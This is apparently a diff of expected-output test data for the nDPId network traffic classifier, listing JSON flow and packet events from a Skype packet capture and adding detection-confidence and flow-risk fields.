 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu9OEAAEARrrjAqAEisGFk+TLdaAsAGvRlnPgCVJNAf7hukPL\/wXB1U06s"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQzIAAEARLjDAqAEiRz4AVTLdg28AGnA0nPoCdLBbJLLwvfiy++3Nr6hQ"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1431969713814,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1431969713814,"pkt":"PBXCt3IOxCwDBkn+CABFAADBLbUAAP8R6nbAqAFc4AAA+xTpFOkArSlHAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAyAAQRfc21iwBgADIABBF9yZmLAGAAMgAEGX2FkaXNrwBgADIABwAwADAABAAAPvAAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADA4AEA1MdWNh4oCZcyBpTWFjwAzAKAAMAAEAAAwOABANTHVjYeKAmXMgaU1hY8Ao"}
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}}
+00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431969713815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":227,"pkt_l4_len":173,"ts_msec":1431969713815,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAK0R\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QCtu5cAAAAAAAQAAwAAAAALX2FmcG92ZXJ0Y3AEX3RjcAVsb2NhbAAADIABBF9zbWLAGAAMgAEEX3JmYsAYAAyAAQZfYWRpc2vAGAAMgAHADAAMAAEAAA+8ABYTTHVjYeKAmXMgTWFjQm9va1Byb8AMwAwADAABAAAMDgAQDUx1Y2HigJlzIGlNYWPADMAoAAwAAQAADA4AEA1MdWNh4oCZcyBpTWFjwCg="}
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}}
+00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1431969713965,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969713965,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuO\/8AAEARXS3AqAEinTeCkTLdAbsAGqTTnQwCwP4SRbwMfSMDCWlEQOP1"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431969713965,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969713965,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuUbAAAEARRubAqAEiQTffJzLdAbsAGjQZnQ4ChKdksriBAZEnlRRV2r4X"}
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714165,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969714165,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969714165,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXlBAAEAG5mHAqAEiW77YfcO\/AbtO2k10AAAAALAC\/\/\/+rQAAAgQFtAEDAwUBAQgKPiOiXAAAAAAEAgAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431969714207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969714207,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0n3BAAPUG8ERbvth9wKgBIgG7w79kPKOqTtpNdYASH\/7vYgAAAgQFoAEDAwQBAQQC"}
@@ -909,7 +908,7 @@
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431969717375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969717375,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0inxAAEAGiT\/AqAEiUYUTucPMrY9zRWLTLqF3x4AQECwsDQAAAQEICj4jroYCsDZE"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1431969717899,"pkt":"PBXCt3IO0NQSxnP1CABFAAEJlCBAADAGQl8Rj6AWwKgBIhRnwSeBM8VdlvCqUoAYASHIigAAAQEIClVKAjo+IiGKFwMBANBGiA2FCgkg8zogS8Wv8uA0hKKXZpqXahZerQ98bBCn7C+LnTtdb1gFMe8akVD0ZXaKV2LbbgrevU7SQvBoNrIKmLDngOd7HnJnwMZSKAgZhBWjSGnNxPPChGecLDOMDXdtNcHO5aH0kerDi4eahd\/xxcweKHEqdaSg9EF7AN1znxgL9Vtu5lzdAyFIAlRZuEfAfgPOG5VblTu4iCKf5kwtqrTH0XrU9yr9hT+57cz\/TU37sy04NvAQJNXRsNfuIJU+SbJ1mgQuWHV+U5AtBgSt"}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431969717900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969717900,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ie5AAEAGPWbAqAEiEY+gFsEnFGeW8KpSgTPGMoAQD\/lO7gAAAQEICj4jsIZVSgI6"}
 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2046,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431969717901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"ts_msec":1431969717901,"pkt":"0NQSxnP1PBXCt3IOCABFAACOywdAAEAG+\/LAqAEiEY+gFsEnFGeW8KpSgTPGMoAYEAClWwAAAQEICj4jsIdVSgI6FwMBACBFSXcAQNGwOhcu0QVlHuKzyvFkGgpCme0Kai94jEbJ0RcDAQAwQN+VK2ikiOW7uk5UyLlTNolrUZSBmQX1wD8NXzXPIFfAPuABh4UNMZuiOLR\/\/d5p"}
 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1431969717905,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1431969717905,"pkt":"PBXCt3IOxCwDBkn+CABFAADBmPEAAP8RfzrAqAFc4AAA+xTpFOkArRpOAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAwAAQRfcmZiwBgADAABBF9zbWLAGAAMAAEGX2FkaXNrwBgADAABwAwADAABAAAPuAAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADAoAEA1MdWNh4oCZcyBpTWFjwAzAMwAMAAEAAAwKABANTHVjYeKAmXMgaU1hY8Az"}
@@ -930,34 +929,34 @@
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2113,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431969718838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969718838,"pkt":"0NQSxnP1PBXCt3IOCABFAAAupZYAAEAR95jAqAEiTLnPDDLdsbUAGqRNnm8CZa4cvOCl2walp\/2oMJDI"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431969719055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1431969719055,"pkt":"0NQSxnP1PBXCt3IOCABFAABXAXoAAEAR9ajAqAEiwKgBAfP2ADUAQxAUbrQBAAABAAAAAAAAE3AwNS1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQZha2FkbnMDbmV0AAABAAE="}
-00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431969719110,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"ts_msec":1431969719110,"pkt":"PBXCt3IO0NQSxnP1CABFAAB3AABAAEARtwLAqAEBwKgBIgA18\/YAY7LlbrSBgAABAAIAAAAAE3AwNS1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQZha2FkbnMDbmV0AAABAAHADAABAAEAAAAZAAQRrGQkwAwAAQABAAAAGQAEEaxkCA=="}
-00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.172.100.36"}}
